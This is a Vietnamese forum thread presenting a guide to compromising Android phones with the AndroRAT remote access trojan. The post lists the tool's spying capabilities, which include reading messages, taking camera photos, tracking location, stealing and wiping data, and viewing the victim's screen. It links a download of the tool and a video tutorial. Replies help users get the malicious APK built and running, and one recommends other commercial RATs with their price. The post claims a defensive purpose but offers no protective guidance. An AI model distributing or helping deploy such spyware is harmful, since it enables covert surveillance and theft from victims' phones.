Hướng dẫn hack điện thoại android - Sử dụng Androrat - Cách phòng tránh và diệt virus

Nhựt Trường

Whi-----
31/10/2013
33
143 bài viết
Hướng dẫn hack điện thoại android - Sử dụng Androrat - Cách phòng tránh và diệt virus

Giới Thiệu Tình Hình
Hôm nay mình sẽ hướng dẫn hack điện thoại android - Sử dụng Androrat, do tình hình nhà nhà sài smartphone người người cầm smartphone mà không hề có sự đề phòng nào hết, dù thông tin trên điện thoại nhiều khi còn quý giá hơn rất nhiều so với máy tính, tất cả thông tin liên lạc, dữ liệu cá nhân giờ điều nằm trên điện thoại. các bước xác thực 2 bước thì cũng cần dùng điện thoại và ai làm ăn mà vào họp bị nghe lén nội dung cuộc họp hay kế hoạch thì công ty đó coi như tiêu.Bài viết chỉ mong các bạn có cái nhìn tổng quát hơn để đề phòng và bảo mật tài khoản của mình
Video nếu có gì thiếu sót mong các bạn góp ý để có nhiều video chất lượng hơn

Chức Năng Androrat:
  • Xem nhật ký cuộc gọi
  • Đọc tin nhắn, gữi tin nhăn
  • Chụp hình cam trước và sau
  • Theo dõi vị trí
  • Xóa dữ liệu
  • Ăn Cắp dữ liệu trong điện thoại
  • Xem màn hình nạn nhân
  • Mở trang web bất kỳ
Nói chung khi bị nhiễm thì hacker có toàn quyền như người dùng đối với điện thoại bạn.
Link Download:
https://drive.google.com/open?id=0B5RHHIY8-fgGa1JrUXVwZkRWVTg
Video Hướng Dẫn:
Hướng dẫn mở port và no-ip: các bạn xem bài này : link
[video=youtube;Z-pJpcrryss]https://www.youtube.com/watch?v=Z-pJpcrryss&feature=youtu.be[/video]

Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Anh cho e hỏi với
em bị lỗi không tạo được file APK!
tools này cần tài gì để có thể chạy được vậy a, e kich vào mà apktool không có động thái gì cả

Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
thường cần thêm java thui

Comment
Sao e chạy file apk trên điện thoại nó báo lỗi crash app? không chạy được nên ko connect đc?

Comment
sinhpn;n58913 đã viết:
Sao e chạy file apk trên điện thoại nó báo lỗi crash app? không chạy được nên ko connect đc?

đt bạn android mấy?ko chạy được là do ko tương thích, bạn có thể thử con Droijack hoặc spynote v2. hai con này đang hot. Nói chung ko con nào chạy ok trên các phiên bản android hết đâu, bạn phải xài nhiều con, rồi tự rút ra kinh nghiệm cho mình. xài free để trải nghiệm thì phải chịu thôi. Có tiền mua xài là sướng nhất (droijack nó bán 210 USD)

Comment
Duyduy8080;n59617 đã viết:
đt bạn android mấy?ko chạy được là do ko tương thích với phiên bản android đó, bạn có thể thử con Droijack hoặc spynote v2. hai con này đang hot. Nói chung ko con nào chạy ok trên các phiên bản android hết đâu, bạn phải xài nhiều con, rồi tự rút ra kinh nghiệm cho mình. xài free để trải nghiệm thì phải chịu thôi. Có tiền mua xài là sướng nhất (droijack nó bán 210 USD)

Comment
Bên trên